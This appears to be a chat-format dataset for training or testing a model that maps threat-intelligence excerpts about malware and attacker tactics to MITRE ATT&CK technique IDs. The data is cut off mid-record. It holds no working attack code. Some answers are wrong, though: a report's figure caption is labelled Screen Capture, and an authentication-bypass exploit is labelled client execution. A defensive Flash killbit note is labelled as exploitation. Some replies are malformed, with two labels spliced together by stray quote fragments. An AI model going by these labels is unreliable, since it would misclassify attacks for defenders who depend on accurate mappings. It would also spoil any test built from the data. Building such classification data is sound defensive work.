- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL links in emails appear to be the Hangover group’s modus operandi"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete uses FTP for Command & Control."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used tools for capturing keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website The network communication is performed in HTTP. The malware uses an hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) To register a new infected system the malware perform a POST request to /api/white_walkers/new with data on the compromised system consisting of"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster."
- },
- {
- "role": "assistant",
- "content": "T1609 - Kubernetes Exec Into Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: Screen capture of the downloader executed on OS X El Capitan"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used a PowerShell-based keylogger named `kl.ps1`."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to pack their tools."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to dump credentials any time a domain, local user, or administrator logs in or changes a password."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has changed the time stamp of certain files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan will save the output of the command to %TEMP%\\win.txt and send the contents to the C2 server or “The length of Cmd result file is ziro!” if the command was unsuccessful"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has used HTTP for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction"
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals is written and executed via PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can exfiltrate data via a DNS tunnel or email, separately from its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "h) It also uses “ActiveXObject” utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to retrieve files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the threat actors shut down VMs, terminate all related processes, and encrypt Vmware-related files (.log, .vmdk, .vmem, .vswp and .vmsn)."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can capture images from webcams on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used ports 53, 80, 443, and 8080 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has discovered removable disks attached to a system."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use RC4 to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used malware to set \"LoadAppInit_DLLs\" in the Registry key \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.010 - Event Triggered Execution: AppInit DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor contain narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors behind this campaign gained access to numerous public and private organizations around the world. They gained access to victims via trojanized updates to SolarWind’s Orion IT monitoring and management software"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has added persistence by registering the file name for the next stage malware under \"HKCU\\Environment\\UserInitMprLogonScript\"."
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can remotely activate the victim’s webcam to capture content."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "provides access to the Windows Registry, which can be used to gather information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148)."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora can monitor processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has operated from leased virtual private servers (VPS) in the United States."
- },
- {
- "role": "assistant",
- "content": "T1583.003 - Virtual Private Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Socksbot can list all running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking."
- },
- {
- "role": "assistant",
- "content": "T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow', 'T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of executing commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe that the modified library file, which we’ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this"
- },
- {
- "role": "assistant",
- "content": "T1600 - Weaken Encryption"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot may use \"netstat -ano\" to display active network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike will timestomp any files or payloads placed on a target machine to help them blend in."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JCry has encrypted files and demanded Bitcoin to decrypt those files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The DNS resolution is performed using DNS over HTTPS (DoH). The malware sends an HTTP POST request to a Google DNS Server (8.8.8.8) using the following headers"
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Mimikatz credential dumper contains an implementation of an SSP."
- },
- {
- "role": "assistant",
- "content": "T1547.005 - Boot or Logon Autostart Execution: Security Support Provider"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windigo has used a script to detect installed software on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Lazarus Group malware sample performs reflective DLL injection."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer can masquerade as a Flash Player update."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installs a service pointing to a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can obtain a list of users."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy a container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has a command to download files to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "What does it mean for everyone and how to defend against such attacks, including zero-day exploits? For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before proceeding to file encryption operations, the ransomware force stops (“kills”) processes listed by process name in a hard-coded list within the encoded strings of the malware. A full list with assessed process function or relationship is provided in Appendix A of this report. While some of the referenced processes appear to relate to security or management software (e.g. Qihoo 360 Safeguard and Microsoft System Center), the majority of the listed processes concern databases (e.g. IBM Tivoli), or ICS-related processes"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has side-loaded its malicious DLL file."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used valid accounts shared between Managed Service Providers and clients to move between the two environments."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
